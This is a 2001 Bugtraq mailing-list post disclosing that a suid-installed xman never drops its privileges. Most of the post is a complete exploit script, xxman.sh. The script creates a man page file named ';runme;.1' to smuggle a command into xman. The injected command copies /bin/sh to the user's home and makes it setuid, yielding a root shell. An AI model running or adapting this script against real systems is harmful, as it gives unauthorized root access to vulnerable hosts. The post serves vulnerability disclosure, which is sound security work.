[21587] in bugtraq
xman (suid) exploit, made easier.
daemon@ATHENA.MIT.EDU (v9@realhalo.org)
Tue Jul 17 17:55:14 2001
Date: 17 Jul 2001 20:28:08 -0000
Message-ID: <20010717202808.26309.qmail@securityfocus.com>
From: <v9@realhalo.org>
To: bugtraq@securityfocus.com
xman doesn't drop privileges anywheres in the
program. but, does support suid installation. so,
exploiting via a system call is much easier than the
buffer overflow in MANPATH, mentioned in another
bugtraq posting. here is an example of such an
exploitation possibility:
-- xxman.sh --
#!/bin/sh
# example of xman exploitation. xman
# supports privileges. but, never
# drops them.
# Vade79 -> v9@realhalo.org -> realhalo.org.
MANPATH=~/xmantest/
mkdir -p ~/xmantest/man1
cd ~/xmantest/man1
touch ';runme;.1'
cat << EOF >~/xmantest/runme
#!/bin/sh
cp /bin/sh ~/xmansh
chown `id -u` ~/xmansh
chmod 4755 ~/xmansh
EOF
chmod 755 ~/xmantest/runme
echo "click the ';runme;' selection," \
"exit. then, check for ~/xmansh."
xman -bothshown -notopbox
rm -rf ~/xmantest
-- xxman.sh --
Vade79 -> v9@realhalo.org -> realhalo.org.
